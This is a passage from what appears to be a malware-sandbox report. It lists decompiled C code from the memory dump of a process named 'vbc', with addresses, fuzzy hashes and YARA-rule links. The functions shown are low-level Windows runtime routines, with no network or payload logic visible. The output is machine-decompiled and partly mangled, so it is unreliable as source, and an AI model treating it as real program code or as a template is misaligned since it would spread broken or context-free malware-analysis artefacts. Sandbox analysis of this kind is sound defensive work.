					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E015B9325();
					_t50 =  *0x16a84c4; // 0x0
					return E0160D0D1(L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                  0x015b9240
                                                  0x015b9242
                                                  0x015b9247
                                                  0x015b924c
                                                  0x015b924e
                                                  0x015b9255
                                                  0x015b9257
                                                  0x015b925a
                                                  0x015b925f
                                                  0x015b925f
                                                  0x015b9266
                                                  0x015b9271
                                                  0x015b9276
                                                  0x015b9279
                                                  0x015b927e
                                                  0x015b9295
                                                  0x015b929a
                                                  0x015b92b1
                                                  0x015b92b6
                                                  0x015b92d7
                                                  0x015b92dc
                                                  0x015b92e0
                                                  0x015b92e6
                                                  0x015b92e8
                                                  0x015b92ee
                                                  0x015b9332
                                                  0x015b9333
                                                  0x015b9337
                                                  0x015b9338
                                                  0x015b933a
                                                  0x015b933a
                                                  0x015b933d
                                                  0x015b9342
                                                  0x015b9342
                                                  0x015b9345
                                                  0x015b9349
                                                  0x015b934e
                                                  0x015b9352
                                                  0x015b9357
                                                  0x015b92f4
                                                  0x015b92f4
                                                  0x015b92f6
                                                  0x015b92f9
                                                  0x015b9300
                                                  0x015b9306
                                                  0x015b9324
                                                  0x015b9324

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 625a7959725941e4c4879b0d6e9e013e0bdb7073b5c0c38a2ca4985cd9e6cd07
                                                  • Instruction ID: 60e996b303987c0feb39099e6fb7f9e3ef4d8e1562a2eb65493f063e1b762652
                                                  • Opcode Fuzzy Hash: 625a7959725941e4c4879b0d6e9e013e0bdb7073b5c0c38a2ca4985cd9e6cd07
                                                  • Instruction Fuzzy Hash: 4C2128B1042A02DFC722EF68CE40F5AB7B9FF58708F55456CA14A8B6A2CB34E955CF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01644257 Relevance: .1, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 90%
                                                  			E01644257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x16908d0);
				E0160D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E016441E8(__ebx, __edi, __ecx, _t39);
				E015CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x16a87e4;
					_t18 =  *0x16a87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x16a5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x16a87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x16a87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L015B7055(_t31 + 0xfffffff8);
								_t24 =  *0x16a87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x16a87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x16a5cd0;
				if( *0x16a5cd0 <= 0) {
					L015B7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x16a87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x16a87e8 = _t30;
						 *0x16a87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0160D0D1(L01644320());
			}















                                                  0x01644257
                                                  0x01644257
                                                  0x01644257
                                                  0x01644259
                                                  0x0164425e
                                                  0x01644263
                                                  0x01644265
                                                  0x01644273
                                                  0x01644278
                                                  0x0164427c
                                                  0x0164427f
                                                  0x01644281
                                                  0x01644287
                                                  0x016442d7
                                                  0x016442d7
                                                  0x016442da
                                                  0x0164428d
                                                  0x0164428d
                                                  0x0164428f
                                                  0x01644292
                                                  0x01644297
                                                  0x0164429c
                                                  0x016442a0
                                                  0x016442a6
                                                  0x016442a8
                                                  0x016442ae
                                                  0x016442b3
                                                  0x00000000
                                                  0x016442ba
                                                  0x016442ba
                                                  0x016442bf
                                                  0x016442c5
                                                  0x016442ca
                                                  0x016442cf
                                                  0x016442d0
                                                  0x00000000
                                                  0x016442d0
                                                  0x016442b3
                                                  0x00000000
                                                  0x016442a6
                                                  0x0164429c
                                                  0x016442dc
                                                  0x016442dc
                                                  0x016442e3
                                                  0x01644309
                                                  0x016442e5
                                                  0x016442e5
                                                  0x016442e8
                                                  0x016442ee
                                                  0x016442f0
                                                  0x00000000
                                                  0x016442f2
                                                  0x016442f2
                                                  0x016442f4
                                                  0x016442f7
                                                  0x016442f9
                                                  0x01644300
                                                  0x01644300
                                                  0x016442f0
                                                  0x0164430e
                                                  0x0164431f

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 95d899d4a954f78fb7e2ba80681ed70940ba6b76261d14be93243d043b6e3268
                                                  • Instruction ID: bbbf7aedc053565bd6a36bc28f865bf82083c2f8bf56edda855d8a18e191d7ea
                                                  • Opcode Fuzzy Hash: 95d899d4a954f78fb7e2ba80681ed70940ba6b76261d14be93243d043b6e3268
                                                  • Instruction Fuzzy Hash: 432149B0900602CFC726DF68DC416A97BE5FF86355B90D26EC10A8B399DB31E461CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015E2397 Relevance: .1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 34%
                                                  			E015E2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x16a848c != 0) {
					L015DFAD0(0x16a8610);
					if( *0x16a848c == 0) {
						E015DFA00(0x16a8610, _t19, _t27, 0x16a8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E015E2581(0x16a8610, 0x15950a0, _t26, _t27, _t28);
						E015DFA00(0x16a8610, 0x15950a0, _t27, 0x16a8610);
					}
				} else {
					L1:
					_t11 =  *0x16a8614; // 0x0
					if(_t11 == 0) {
						_t11 = E015F4886(0x1591088, 1, 0x16a8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E015E2581(0x16a8610, (_t11 << 4) + 0x1595070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                  0x015e23b0
                                                  0x015e23b6
                                                  0x015e2409
                                                  0x015e2415
                                                  0x01625ae9
                                                  0x00000000
                                                  0x015e241b
                                                  0x015e241b
                                                  0x015e241d
                                                  0x015e2427
                                                  0x015e242e
                                                  0x015e2430
                                                  0x015e2430
                                                  0x015e23b8
                                                  0x015e23b8
                                                  0x015e23b8
                                                  0x015e23bf
                                                  0x015e23fc
                                                  0x015e23fc
                                                  0x015e23c1
                                                  0x015e23c3
                                                  0x015e23d0
                                                  0x015e23d8
                                                  0x015e23d8
                                                  0x015e23dc
                                                  0x015e23de
                                                  0x015e23e1
                                                  0x015e23e1
                                                  0x015e23ec

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 03e66ad408b97bc1e6e1361f5cf5fc3c25c841c29e4031395e29d8e64df948b9
                                                  • Instruction ID: 150b437c06ca4e62f327b31d8d48314ecb67fb5339d7e7cc824040fca15aef4d
                                                  • Opcode Fuzzy Hash: 03e66ad408b97bc1e6e1361f5cf5fc3c25c841c29e4031395e29d8e64df948b9
                                                  • Instruction Fuzzy Hash: 44118E32B0431267E7389A2D9C88F1AB7CCFBA4621F18442BF6039F244D6B0E8418F65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 016346A7 Relevance: .1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E016346A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L015D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E015FF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E015ED268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L015D77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                  0x016346b7
                                                  0x016346ba
                                                  0x016346c5
                                                  0x016346c8
                                                  0x016346d0
                                                  0x016346d4
                                                  0x016346e6
                                                  0x016346e9
                                                  0x016346f4
                                                  0x016346ff
                                                  0x01634705
                                                  0x01634706
                                                  0x0163470c
                                                  0x01634713
                                                  0x0163471b
                                                  0x01634723
                                                  0x01634725
                                                  0x016346d6
                                                  0x016346d9
                                                  0x016346db
                                                  0x016346db
                                                  0x01634732

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                  • Instruction ID: 01d9213f6338449872cdbe397b9defca18e3f05facde381a7b71b75f0953bfce
                                                  • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                  • Instruction Fuzzy Hash: 1011C272904209BBC7159F5C98809BEF7B9FFD5314F10806AF9448B351DA318D55D7A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015BC962 Relevance: .1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 42%
                                                  			E015BC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x16ad360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E015CEEF0(0x16a70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0163F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E015CEB70(_t29, 0x16a70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E015FB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0163F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x16a70c0; // 0x0
					while(_t38 != 0x16a70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x16ab1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                  0x015bc96a
                                                  0x015bc974
                                                  0x015bc988
                                                  0x015bc98a
                                                  0x01627c9d
                                                  0x01627c9f
                                                  0x01627ca4
                                                  0x01627cae
                                                  0x01627cf0
                                                  0x01627cf5
                                                  0x01627cfa
                                                  0x015bc992
                                                  0x015bc996
                                                  0x015bc997
                                                  0x015bc998
                                                  0x015bc9a3
                                                  0x015bc9a3
                                                  0x01627cb0
                                                  0x01627cb7
                                                  0x01627cbb
                                                  0x00000000
                                                  0x00000000
                                                  0x01627cbd
                                                  0x01627ce8
                                                  0x01627cc5
                                                  0x01627cc8
                                                  0x01627cca
                                                  0x01627cd0
                                                  0x01627cd6
                                                  0x01627cde
                                                  0x01627ce4
                                                  0x01627ce4
                                                  0x01627cd0
                                                  0x00000000
                                                  0x01627ce8
                                                  0x015bc990
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 31184be68bbc8d4eee81ce75bc30a8045efcba9f3e1efc4013b53a60e700b3f9
                                                  • Instruction ID: 3a2019d114417aa394c0fbe65bcd1eeb8a2da8e1a037be82d2a50ed89d27e776
                                                  • Opcode Fuzzy Hash: 31184be68bbc8d4eee81ce75bc30a8045efcba9f3e1efc4013b53a60e700b3f9
                                                  • Instruction Fuzzy Hash: 7211CE31700A169FC720AE78DC86A2B7BE5FBA4615F40052DE94287651DB21FC10CFD2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F37F5 Relevance: .1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E015F37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E015D2280(_t6, 0x16a8550);
				}
				_t29 = E015F387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E015CFFB0(0x16a8550, _t27, 0x16a8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                  0x015f37fa
                                                  0x015f37fc
                                                  0x015f3805
                                                  0x015f3808
                                                  0x015f3808
                                                  0x015f3814
                                                  0x015f3818
                                                  0x015f3846
                                                  0x015f3848
                                                  0x015f384b
                                                  0x015f384b
                                                  0x015f3852
                                                  0x00000000
                                                  0x015f3854
                                                  0x015f3856
                                                  0x00000000
                                                  0x00000000
                                                  0x015f3863
                                                  0x00000000
                                                  0x015f3863
                                                  0x015f381a
                                                  0x015f381a
                                                  0x015f381f
                                                  0x015f386e
                                                  0x015f386e
                                                  0x015f3871
                                                  0x015f3873
                                                  0x015f3873
                                                  0x015f3868
                                                  0x00000000
                                                  0x015f3868
                                                  0x015f3821
                                                  0x015f3826
                                                  0x00000000
                                                  0x00000000
                                                  0x015f3828
                                                  0x015f382a
                                                  0x015f3841
                                                  0x00000000
                                                  0x015f3841

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ad71b3704992e16f9ab043b07d84f5d862d300c2bc58802d5f3718d8ce9ca340
                                                  • Instruction ID: 5ca464f8ad2880cafcb88f668cabb08281ea57a94bd73d56c3fdf2a6f586e971
                                                  • Opcode Fuzzy Hash: ad71b3704992e16f9ab043b07d84f5d862d300c2bc58802d5f3718d8ce9ca340
                                                  • Instruction Fuzzy Hash: E70104B29026129BE3778A1D9900A2ABBE6FFC5A60F15446DEA458F301C738CC01C790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015E002D Relevance: .1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E015E002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E015D7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E015D7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E015D7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E015D7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                  0x015e0032
                                                  0x015e0037
                                                  0x015e0043
                                                  0x01624b3a
                                                  0x015e0049
                                                  0x015e0049
                                                  0x015e0049
                                                  0x015e004e
                                                  0x015e0053
                                                  0x01624b48
                                                  0x01624b5a
                                                  0x01624b4a
                                                  0x01624b53
                                                  0x01624b53
                                                  0x01624b5f
                                                  0x00000000
                                                  0x01624b61
                                                  0x00000000
                                                  0x01624b61
                                                  0x015e0059
                                                  0x015e0059
                                                  0x015e0060
                                                  0x01624b6f
                                                  0x01624b6f
                                                  0x015e0069
                                                  0x01624b83
                                                  0x00000000
                                                  0x00000000
                                                  0x01624b90
                                                  0x01624b9b
                                                  0x01624b9b
                                                  0x01624ba4
                                                  0x00000000
                                                  0x00000000
                                                  0x01624baa
                                                  0x00000000
                                                  0x015e006f
                                                  0x015e006f
                                                  0x00000000
                                                  0x015e006f
                                                  0x015e0069

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                  • Instruction ID: d69322769b272af9074a17e59dd909e652e2a924b1013b048cf7f400f46a9d1e
                                                  • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                  • Instruction Fuzzy Hash: 9A11E132B05A928FE723972CC948B353BD4BF46B59F0900A0ED049FB92DB68C841CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015C766D Relevance: .1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 94%
                                                  			E015C766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E015EF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E015EF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L015D4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                  0x015c7672
                                                  0x015c767f
                                                  0x015c7689
                                                  0x015c76de
                                                  0x015c76de
                                                  0x015c768b
                                                  0x015c7691
                                                  0x015c7693
                                                  0x015c7697
                                                  0x00000000
                                                  0x015c7699
                                                  0x015c76a8
                                                  0x00000000
                                                  0x015c76aa
                                                  0x015c76ad
                                                  0x015c76b1
                                                  0x00000000
                                                  0x015c76b3
                                                  0x015c76b3
                                                  0x015c76b5
                                                  0x015c76ba
                                                  0x015c76bc
                                                  0x015c76bc
                                                  0x015c76c0
                                                  0x00000000
                                                  0x015c76c2
                                                  0x015c76ce
                                                  0x015c76ce
                                                  0x015c76c0
                                                  0x015c76b1
                                                  0x015c76a8
                                                  0x015c7697
                                                  0x015c76d9

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                  • Instruction ID: fdc5a13ae1f7685749c18e454e62169a56f6f526c7b5eb37ebffdc2d37ce9bc7
                                                  • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                  • Instruction Fuzzy Hash: 66018872700129AFD7209E9ECC45E5B7BADFB98B60B140528BA09CF650DA30DD41CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015B9080 Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 69%
                                                  			E015B9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x16a85ec;
				E015D2280(_t48, 0x16a85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E015CFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x16a538c; // 0x773a6828
					if( *_t84 != 0x16a5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x168f6e8);
						E0160D0E8(0x16a85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E016888F5(_t80, _t85, 0x16a5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x16a86c0; // 0x11507b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x16a86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E015D2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E016888F5(0x16a85ec, _t85, 0x16a5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E015FAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x16ab1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x16a84c0;
																			if(_t82 >=  *0x16a84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01689063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
